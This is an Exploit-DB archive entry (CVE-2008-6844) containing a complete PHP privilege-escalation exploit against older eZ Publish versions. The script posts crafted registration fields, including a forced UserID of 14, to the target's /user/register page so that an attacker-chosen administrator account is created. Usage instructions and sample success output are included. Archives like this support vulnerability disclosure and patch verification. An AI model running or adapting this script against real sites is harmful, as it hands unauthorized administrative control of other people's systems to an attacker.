EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation

EDB-ID:

7406

CVE:

2008-6844

EDB Verified:

Author:

s4avrd0w

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-12-10

Vulnerable App: 
<?php

/*
	eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
	Versions affected >= 3.5.6
	Resolved in 3.9.5, 3.10.1, 4.0.1
	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible

	* tested on version 3.9.0

	usage: 

	# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server

	The options are required:

	-u Login of the new admin on eZ Publish
	-p Password of the new admin on eZ Publish
	-e Email where to go the letter for activation new admin account
	-s Target for privilege escalation

	example:

	# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
	[+] Exploit successfully sending
	[+] Activate your new account and be registered in system using toor/P@ssw0rd
*/

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server

The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email where to go the letter for activation new admin account
 -s Target for privilege escalation

example:

# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using toor/P@ssw0rd

";
}

function successfully($login,$password)
{
print "
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using $login/$password
";
}

if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array(); 
	foreach ($argv as $arg) { 
		if (strpos($arg, '-') === 0) { 
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
		} 
	}

	if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
	{

		$post_fields = array(
			'ContentObjectAttribute_data_user_login_30' => $ARG[u],
			'ContentObjectAttribute_data_user_password_30' => $ARG[p],
			'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
			'ContentObjectAttribute_data_user_email_30' => $ARG[e],
			'UserID' => '14',
			'PublishButton' => '1'
		);

		$headers = array(
		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
		    'Referer' => $ARG[s]
		);

		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
		$res_http->addPostFields($post_fields);
		$res_http->addHeaders($headers);
		try {
    			$response = $res_http->send()->getBody();

			if (eregi("success", $response))
			{
				successfully($ARG[u],$ARG[p]);
			}
			else
			{
				print "[-] Exploit failed";
			}

		} catch (HttpException $exception) {

			print "[-] Not connected";
			exit(0);

		}

	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	} 
}

?>

# milw0rm.com [2008-12-10]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services